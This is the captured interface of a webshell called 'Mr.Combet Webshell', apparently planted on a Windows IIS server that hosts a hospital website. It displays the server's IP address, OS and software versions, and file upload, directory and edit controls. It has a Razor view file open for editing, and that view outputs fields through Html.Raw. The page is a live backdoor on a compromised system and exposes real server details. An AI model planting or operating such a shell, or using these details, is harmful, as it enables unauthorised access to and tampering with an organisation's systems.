Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
BNBHospital
/
Views
/
ContentPage
/
Edit File Name :
Detail.cshtml
@model bnb.Models.ContentPageViewModel @{ ViewBag.Title = "Detail"; Layout = "~/Views/Shared/_Layout.cshtml"; } <h2>Content Page Details</h2> <div> <hr /> <dl class="dl-horizontal"> <dt> @Html.DisplayNameFor(model => model.ContentPageTitle) </dt> <dd> @Html.DisplayFor(model => model.ContentPageTitle) </dd> <dt> @Html.DisplayNameFor(model => model.PublishDate) </dt> <dd> @Model.PublishDate.ToString("yyyy/MM/dd") </dd> <dt> @Html.DisplayNameFor(model => model.Thumbnail) </dt> <dd> @Html.DisplayFor(model => model.Thumbnail) </dd> <dt> @Html.DisplayNameFor(model => model.Description) </dt> <dd> @Html.Raw(Model.Description) </dd> <dt> @Html.DisplayNameFor(model => model.CreatedBy) </dt> <dd> @Html.DisplayFor(model => model.CreatedBy) </dd> <dt> @Html.DisplayNameFor(model => model.CreatedDate) </dt> <dd> @Html.DisplayFor(model => model.CreatedDate) </dd> <dt> @Html.DisplayNameFor(model => model.UpdatedBy) </dt> <dd> @Html.DisplayFor(model => model.UpdatedBy) </dd> <dt> @Html.DisplayNameFor(model => model.UpdatedDate) </dt> <dd> @Html.Raw(Model.UpdatedDate) </dd> <dt> @Html.DisplayNameFor(model => model.IsActive) </dt> <dd> @Html.DisplayFor(model => model.IsActive) </dd> </dl> </div> <div class="form-group"> <div class="col-md-offset-2 col-md-10"> @Html.ActionLink("Back to List", "Index", null, htmlAttributes: new { @class = "btn btn-info" }) </div> </div>
Save